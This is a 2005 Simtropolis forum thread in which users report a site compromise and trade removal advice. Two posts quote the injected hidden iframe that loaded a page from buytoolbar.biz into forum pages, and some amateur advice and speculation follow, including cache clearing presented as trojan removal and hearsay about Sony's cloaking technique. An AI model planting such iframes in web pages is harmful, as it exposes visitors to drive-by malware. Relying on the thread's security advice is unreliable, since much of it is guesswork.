Jump to content
Sign In to follow this  
1ajs

atention admin sever you have a virus

114 posts in this topic Last Reply

Highlighted Posts

Posted:
Last Online: A long, long time ago... 
 

Yep, this is what I get when I click on anything on the all forums page:

Microsoft VBScript compilation error '800a0400'

Expected statement

/idealbb/forum.asp, line 59

< iframe src=http://buytoolbar.biz/dl/adv798.php width=1 height=1>
^
EDIT: Here's a pic:

virus11pr.jpg

Share this post


Link to post
Share on other sites
Posted:
Last Online:  
 

Ok! I figured out on a thread if you look on the upper right corner of your browser window above the Simtopolis winter banner you'll see a virus

ok! I got you guys some virus removeal instuctions...

oh and sorry about the double post...

to remove the JS.MHTMLRedir!exploit, HTML.MHTMLRedir.exploit trojan, JScript/RunRunEXE!Trojan vruses simply...

1.In Control Panel, open Internet Options.

2. Click the General tab, and then under Temporary Internet files, click Delete Files.

3. In the Delete Files dialog box, click to select the Delete all off-line content check box if you want to delete all Web page content that you have made available offline.

4. Click OK.

WARNING! when you are cleaning your temperary files your computer may slow down somewhat...don't worry..it's cleaning out your cookies basicly so it'll take a little while 2.gif

Now if you still have the other viruses from the last attacks simply

1. From the Start button, click Settings> Control Panel

2. In the Control Panel, open the Java Plug-in Control Panel

3. Select the Cache Tab

4. Click the Clear button inside the Cache Tab, which will clear your JRE cache directory

and i you don't feel that was enough then

1.Go to Control Panel again.

2.In the control Panel, click the java icon that looks like a cup of coffee(java) then in the General Tab under Temporary Internet files,click the Delete files button then in that click Ok.then wait a little bit and you're done!

links!

HTML.MHT.Redir!exploit info

Java.ByteVerify!exploit info


Java.Shinwow Info

just doing all I can to help 2.gif and again Sorry for the double post...unless somebody just posted then nevermind 1.gif

Share this post


Link to post
Share on other sites
Posted:
Last Online:  
 

Hmm yea the computer at my college found 200 and counting viruses at Simtropolis, using Trend Micro office scan. Could it be that the winter banner itself is infected?  

Share this post


Link to post
Share on other sites
Posted:
Last Online:  
 
For some reason, I get a HTTP 500 error message when I try to access the thread overviews. I can click on the last post link, though (I accessed this thread with such a link). This is what Firefox displays me:
 
 

Microsoft VBScript compilation error '800a0400'

Expected statement

/idealbb/forum.asp, line 59

<iframe src=http://buytoolbar.biz/dl/adv798.php width=1 height=1></iframe>
^
EDIT: Nevermind, I just saw mayormommy posted the same thing...

Share this post


Link to post
Share on other sites
Posted:
Last Online: A long, long time ago... 
 

I suppose now I'm just getting paranoid, but why are there so many anonymous users today? 47.gif

virus27wy.jpg

Share this post


Link to post
Share on other sites
Posted:
Last Online: A long, long time ago... 
 

The only way I can get to a thread and make a post is clicking on the last posted link.

Share this post


Link to post
Share on other sites
Posted:
Last Online:  
 
Date: 12/8/2005 11:26:22 AM
Author: Boggy1
Erm..what on earth is this? Does this have something to do with the problems? It's on every forum.


weirdstforumthing9er.png
quote>
If you look back on Page 3 of this thread,Rymac91 says the same thing and he says it's a virus loading to the page so Yes it has got something to do with the problems.

Share this post


Link to post
Share on other sites
Posted:
Last Online:  
 

Yeah the forums seem to be working now, but is the problem really solved?

Share this post


Link to post
Share on other sites
Posted:
Last Online: A long, long time ago... 
 

I saw that loading buytoolbar.biz thing and disconnected the internet. I blocked the site, but I dont know if that'll work. I tried the stuff rymac suggested, my computer is actually going a bit faster now so it must have helped.

Share this post


Link to post
Share on other sites
Posted:
Last Online: A long, long time ago... 
 

I have not noticed anything out of the ordinary today so I think it might be fixed for the time being but please be vigulant.

Share this post


Link to post
Share on other sites
Posted:
Last Online:  
 

norton found a trojan on my PC when i opened posted today page. hmmmm...

Share this post


Link to post
Share on other sites
Posted:
Last Online:  
 

The script was hidden in the source code as has been illustrated. To the best of my knowledge, Dirk has removed all of the instances from the forum code. The redirect in question is to a site somewhere in Russia near St. Petersburg (I did a tracert from my router and forwarded the results to Dirk).

My best advice is to disable java on IE or on Firefox to download the NoScript extension and use it. It is available here .

That's how I was alerted to the existance of the malicious script in the first place.

Also, run your virus scanner all the time and make sure it's updated. If you don't have one, get AVG . It's free and highly rated. Run multiple spyware detectors as well. It's all those things that you *should* always do, but don't.

Cheers.

Share this post


Link to post
Share on other sites
Posted:
Last Online:  
 

To all those who have noticed the ASP.Net account on their computer,  the account in-and-of-itself isn't bad; just the fact that it was activated.  The ASP.Net account is part of the Microsoft's .Net motley of software and its presence is normal on all Windows 2000 and later machines.  So, in breakdown:

ASP.Net account itself: not bad
Fact the ASP.Net account was activated: bad (means something wanted to use your computer as a web server)
Fact the ASP.Net account is hidden except in the Control Panel: not bad (Microsoft's way to ensure that the account doesn't get fiddled with by accident)
That the account is password-protected: not good
 

General Rules|Chat Rules

"Adherence to one's principles should not prevent satisfaction of those same principles."

Share this post


Link to post
Share on other sites
Posted:
Last Online: A long, long time ago... 
 

I couldn't get on the site all day with out being pinged with a virus notifacation.  I assume that its fixed now.

I would love to find the person responsible and rip them a new one.32.gif'); height=15 alt=Insert smilie 32.gif src=https://www.simtropolis.com/idealbb/images/smilies/32.gif width=15 border=0>

Share this post


Link to post
Share on other sites
Posted:
Last Online:  
 
Date: 12/8/2005 4:31:48 PM Author: hym
ASP.Net account itself: not bad
Fact the ASP.Net account was activated: bad (means something wanted to use your computer as a web server)
Fact the ASP.Net account is hidden except in the Control Panel: not bad (Microsoft's way to ensure that the account doesn't get fiddled with by accident)
That the account is password-protected: not good

quote>
The fact that the account is hidden except in the control panel is bad because Windows isn't supposed to permanently hide files from the system administrators.  Microsoft wouldn't bother to go to the trouble to prevent the files from showing up in the file directories in Windows Explorer.  If they valued these files like that, they would have also taken the time to make sure that other stuff like the registry and other files that are really important are invisible to user accounts that are limited.  Whatever it was that activated that user account didn't want to be seen.
 
Sony released to the public not that long ago (because of the trouble that they got into over their DRM music software) that they had figured out how to make a file totally invisible to the computer.  So invisible that Windows will completely fail to recognize that a file even exists.  Sony released the method for doing that to the entire world, and now every hacker and ne'er-do-well has access to the information necessary to make a totally invisible virus.  If you ask me, from what I could tell from talking to friends of mine that are in the business of PC programming and general security, the fact that the ASP.Net account was totally invisible in the file directories doesn't guarantee that whatever activated it was using the Sony invisible file trick, but it sure indicates a possibility.  What's more: Sony's little secret has been successfully used by security experts to fool an anti-virus program into thinking that no such file exists on the computer.  These were all tests, but now that a virus can come in attached to a picture, and can make itself totally invisible to the infected computer, that doesn't sound like a good prospect.

Share this post


Link to post
Share on other sites
Posted:
Last Online:  
 
Date: 12/8/2005 4:31:48 PM
Author: hym

To all those who have noticed the ASP.Net account on their computer, the account in-and-of-itself isn't bad;

quote>

Just to clarify, the Windows system account is ASPNET, no dot, all caps. The full name field should be ASP.NET Machine Account. Any account which doesn't match this exactly should be looked upon with suspicion.

Share this post


Link to post
Share on other sites
Posted:
Last Online: A long, long time ago... 
 

I've been having a lot of trouble posting lately, and earlier today I could not view the STEX or post, even though I was logged on. I re-logged on, and got logged off while trying to post... something's definitly not right.

Share this post


Link to post
Share on other sites

Sign In or register to comment...

To comment in reply, you must be a community member

Sign In  

Already have an account? Sign in here.

Sign In Now

Create an Account  

Sign up to join our friendly community. It's easy!  

Register a New Account

Sign In to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×

Thank You for the Continued Support!

Simtropolis depends on donations to fund site maintenance costs.
Without your support, we just would not be in our 24th year online!  You really help make this a great community. *:thumb:

But we still need your support to stay online. If you're able to, please consider a donation to help us stay up and running. This helps sustain a platform where we can share our community creations for years to come.

Make a Donation, Get a Gift!

Expand your city with the best from the Simtropolis Exchange.
Make a Donation and get one or all three discs today!

STEX Collections

By way of a "Thank You" gift, we'd like to send you our STEX Collector's DVD. It's some of the best buildings, lots, maps and mods collected for you over the years. Check out the STEX Collections for more info.

Each donation helps keep Simtropolis online, open and free!

Thank you for reading and enjoy the site!

More About STEX Collections